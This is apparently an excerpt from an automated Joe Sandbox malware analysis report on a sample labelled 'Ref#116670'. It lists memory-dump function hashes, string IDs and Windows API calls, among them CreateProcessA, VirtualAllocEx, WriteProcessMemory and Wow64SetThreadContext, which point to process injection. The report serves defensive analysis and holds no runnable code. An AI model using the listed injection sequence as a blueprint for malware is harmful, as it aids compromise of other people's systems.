                                                                                                                                  • Opcode ID: a3afe70791edf2c0edd7d6fabfd3f4a853d379fcf866dd5a1b80c58c04976539
                                                                                                                                  • Instruction ID: cefd954de3b18331ec8bd3091e1b9926d0eb3d4a19dffc5904cd5a87970fbe73
                                                                                                                                  • Opcode Fuzzy Hash: a3afe70791edf2c0edd7d6fabfd3f4a853d379fcf866dd5a1b80c58c04976539
                                                                                                                                  • Instruction Fuzzy Hash: D7B104B4E05218CFDB64CFA9D988BADBBF6BF89304F1091A9D149EB251DB705980CF10
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: EE(}
                                                                                                                                  • API String ID: 0-2285280019
                                                                                                                                  • Opcode ID: 11622bf1b95bf6c872b0d2258342c02d045a3eda85ebffb608217c515f3c3547
                                                                                                                                  • Instruction ID: fffb3478076e92f20a9372c553cc8c46275f77daa457c3a3566d18bcef6143e0
                                                                                                                                  • Opcode Fuzzy Hash: 11622bf1b95bf6c872b0d2258342c02d045a3eda85ebffb608217c515f3c3547
                                                                                                                                  • Instruction Fuzzy Hash: B08137B0E052089FDB44DFA9D484AEEBBF6FF88300F14846AE415AB355EB34A945CF50
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: EE(}
                                                                                                                                  • API String ID: 0-2285280019

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 1160 245db40-245dbcf GetCurrentProcess 1164 245dbd1-245dbd7 1160->1164 1165 245dbd8-245dc0c GetCurrentThread 1160->1165 1164->1165 1166 245dc15-245dc49 GetCurrentProcess 1165->1166 1167 245dc0e-245dc14 1165->1167 1168 245dc52-245dc6a 1166->1168 1169 245dc4b-245dc51 1166->1169 1167->1166 1173 245dc73-245dca2 GetCurrentThreadId 1168->1173 1169->1168 1174 245dca4-245dcaa 1173->1174 1175 245dcab-245dd0d 1173->1175 1174->1175
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0245DBBE
                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 0245DBFB
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0245DC38
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0245DC91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2250151688.0000000002450000.00000040.00000800.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2450000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                  • Opcode ID: 9c47183a5c261ce2095bd120bac5ea02d2135cb2077d8bb9882f8c5a70b7b542
                                                                                                                                  • Instruction ID: 7a1938a27d5849d5bab5afa0ab325b0706198c79ee3c23caca68c92e7122731a
                                                                                                                                  • Opcode Fuzzy Hash: 9c47183a5c261ce2095bd120bac5ea02d2135cb2077d8bb9882f8c5a70b7b542
                                                                                                                                  • Instruction Fuzzy Hash: 2A5185B0D01209CFDB14DFA9C648BAEBBF1FF88304F24845AE449A7361C774A984CB65

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Haq$Haq$Haq
                                                                                                                                  • API String ID: 0-3013282719
                                                                                                                                  • Opcode ID: 01cccce533b42cb7600c1a0157ce7ad3baba7f70f033f4a3044fe3c47668649d
                                                                                                                                  • Instruction ID: 9276b8df52d31583f9ea73b777ad4d8b5e9937cd453d0fbebcbc0c131cb0c079
                                                                                                                                  • Opcode Fuzzy Hash: 01cccce533b42cb7600c1a0157ce7ad3baba7f70f033f4a3044fe3c47668649d
                                                                                                                                  • Instruction Fuzzy Hash: A7125D30A002049FCB54EFA5C894AAEBBF2FF88310B14856DE5169F755DB35ED46CB90

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q$4']q$4']q
                                                                                                                                  • API String ID: 0-705557208
                                                                                                                                  • Opcode ID: 7d0cedea73d768722191aea47f1f05e85e3d2472ff6f28532e862764b35f7667
                                                                                                                                  • Instruction ID: d94da3c460941e7614eea2433aa0081397d4dcca05eb3c4f69d1ed0640340a1b
                                                                                                                                  • Opcode Fuzzy Hash: 7d0cedea73d768722191aea47f1f05e85e3d2472ff6f28532e862764b35f7667
                                                                                                                                  • Instruction Fuzzy Hash: 2BF1C934A10218DFCB44EFA4D994A9DBBB2FF89310F118158E506AB3A5DB75EC42CF50
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270678838.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6890000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q$4']q
                                                                                                                                  • API String ID: 0-3120983240
                                                                                                                                  • Opcode ID: e8546bdc5c01acb554059d975c760f81c3b19ce4295d06402a5f61641f02a3c0
                                                                                                                                  • Instruction ID: 859838d57fcecb2240271971edf7c239815874c70a3ed04eb80277bd03d303cf
                                                                                                                                  • Opcode Fuzzy Hash: e8546bdc5c01acb554059d975c760f81c3b19ce4295d06402a5f61641f02a3c0
                                                                                                                                  • Instruction Fuzzy Hash: 8F42F734E1420DDFEF94DBA8D8686ADB7B6FF88314F148415DA12E7294C7345A86CFA0

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270678838.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6890000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q$4']q
                                                                                                                                  • API String ID: 0-3120983240
                                                                                                                                  • Opcode ID: cd403db357be6f061dff2b3ef9e874231fdca8a2f9affb6c59ccc0a1b350cf61
                                                                                                                                  • Instruction ID: bbfff103345fc87156f18dab8971a53080b4a98123b656d560f65808f041488e
                                                                                                                                  • Opcode Fuzzy Hash: cd403db357be6f061dff2b3ef9e874231fdca8a2f9affb6c59ccc0a1b350cf61
                                                                                                                                  • Instruction Fuzzy Hash: 47F1D134E1120CEFDF98DFA4E5A46ACBBB2FF49315F248429E506A7291CB345A85CF50

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (aq$d
                                                                                                                                  • API String ID: 0-3557608343
                                                                                                                                  • Opcode ID: fcba61103e45106b2071a00345430b3f6c7f545988515ed8987ef49a6cd6e51a
                                                                                                                                  • Instruction ID: d924861b6b3dccffe91cd9539bba7a61af01701381a1dfd67d7597200d0640d3
                                                                                                                                  • Opcode Fuzzy Hash: fcba61103e45106b2071a00345430b3f6c7f545988515ed8987ef49a6cd6e51a
                                                                                                                                  • Instruction Fuzzy Hash: BED17934600606CFCB14DF29C58096ABBF6FF89314B15C969E55A8F765DB30F846CBA0

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270678838.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6890000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q$4']q
                                                                                                                                  • API String ID: 0-3120983240
                                                                                                                                  • Opcode ID: 28d6e9386c8d500bd9bb5b78d4ae86ac39a04f3f91db2346249bbae7dea0489e
                                                                                                                                  • Instruction ID: 0fbd7f65cd0def4ecea1dd368408650d065a01962a6fe2cc5a7a6c7257da7af8
                                                                                                                                  • Opcode Fuzzy Hash: 28d6e9386c8d500bd9bb5b78d4ae86ac39a04f3f91db2346249bbae7dea0489e
                                                                                                                                  • Instruction Fuzzy Hash: FA91FE30E05208CFDF98DFA9D9486EDBBB6AF89315F148429D522B7390CB316985CF60

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (aq$Haq
                                                                                                                                  • API String ID: 0-3785302501
                                                                                                                                  • Opcode ID: c66bcbf7ae56b30a1a2cb986b8c7adb27c66fd23b04400dd0f5634ff19039786
                                                                                                                                  • Instruction ID: 538d9a95b753e273645ceab42c5e0e0607c3869815fc7f9a2596745e657b80ba
                                                                                                                                  • Opcode Fuzzy Hash: c66bcbf7ae56b30a1a2cb986b8c7adb27c66fd23b04400dd0f5634ff19039786
                                                                                                                                  • Instruction Fuzzy Hash: E35158307002158FC799AF38C454A6EBBB2BF89310B1584ADE5169F3A5CE35ED46CB91
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (aq$(aq
                                                                                                                                  • API String ID: 0-3916115647
                                                                                                                                  • Opcode ID: d3d630050af9618f4832dc01574050523c2310c1893a56d98e392569e7cef3ca
                                                                                                                                  • Instruction ID: 0a8bc3d3518901d453a628fce929022f6c8239e70d946dbe55ba4bd8ffea03b5
                                                                                                                                  • Opcode Fuzzy Hash: d3d630050af9618f4832dc01574050523c2310c1893a56d98e392569e7cef3ca
                                                                                                                                  • Instruction Fuzzy Hash: FA51AC317002198FDB54AF29D864AAE3BA6FF88310F108069E906CF395CF39DD42CB91
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,aq
                                                                                                                                  • API String ID: 0-3092978723
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (_]q
                                                                                                                                  • API String ID: 0-188044275
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0245B6FE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2250151688.0000000002450000.00000040.00000800.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2450000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleModule
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05CB132A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05CB132A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  APIs
                                                                                                                                  • CopyFileA.KERNEL32(?,?,?), ref: 05CD7335
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264799606.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cd0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CopyFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1304948518-0
                                                                                                                                  APIs
                                                                                                                                  • CopyFileA.KERNEL32(?,?,?), ref: 05CD7335
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264799606.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cd0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CopyFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1304948518-0
                                                                                                                                  APIs
                                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05CB2248
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                  APIs
                                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05CB2248
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                  APIs
                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05CB1996
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                  APIs
                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05CB1996
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                  APIs
                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0245DE0F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2250151688.0000000002450000.00000040.00000800.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2450000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                  APIs
                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06A0DB6C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                  APIs
                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06A0DB6C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                  APIs
                                                                                                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 06ACD34C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271312582.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6ac0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                  APIs
                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05CB1F86
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  APIs
                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05CB1F86
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0245B6FE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2250151688.0000000002450000.00000040.00000800.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2450000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleModule
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q
                                                                                                                                  • API String ID: 0-1259897404
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270471714.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6810000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: TJbq
                                                                                                                                  • API String ID: 0-1760495472
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (aq
                                                                                                                                  • API String ID: 0-600464949
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: paq
                                                                                                                                  • API String ID: 0-3273118895
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (aq
                                                                                                                                  • API String ID: 0-600464949
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: p<]q
                                                                                                                                  • API String ID: 0-1327301063
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270678838.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6890000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q
                                                                                                                                  • API String ID: 0-1259897404
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270835574.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_68d0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q
                                                                                                                                  • API String ID: 0-1259897404
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q
                                                                                                                                  • API String ID: 0-1259897404
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q
                                                                                                                                  • API String ID: 0-1259897404
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: `iL
                                                                                                                                  • API String ID: 0-2296755867
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q
                                                                                                                                  • API String ID: 0-1259897404
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: `iL
                                                                                                                                  • API String ID: 0-2296755867
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271492048.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6d70000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: H
                                                                                                                                  • API String ID: 0-2852464175
                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNEL32(?,?,?,?), ref: 06ACE32B
                                                                                                                                  Memory Dump Source
